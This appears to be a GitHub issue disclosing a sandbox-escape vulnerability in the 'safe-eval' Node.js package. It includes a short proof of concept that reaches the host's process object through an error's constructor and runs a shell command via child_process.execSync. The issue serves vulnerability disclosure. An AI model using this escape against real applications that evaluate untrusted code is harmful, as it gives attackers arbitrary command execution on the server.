Open seongil-wi opened 1 year ago
// node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } })() ` safeEval(code);
We found a sandbox escaping bug. This bug can be triggered by calling propertyIsEnumerable.call() function. Also, we can execute arbitrary shell code using the process module.
propertyIsEnumerable.call()
We found a sandbox escaping bug. This bug can be triggered by calling
propertyIsEnumerable.call()function. Also, we can execute arbitrary shell code using the process module.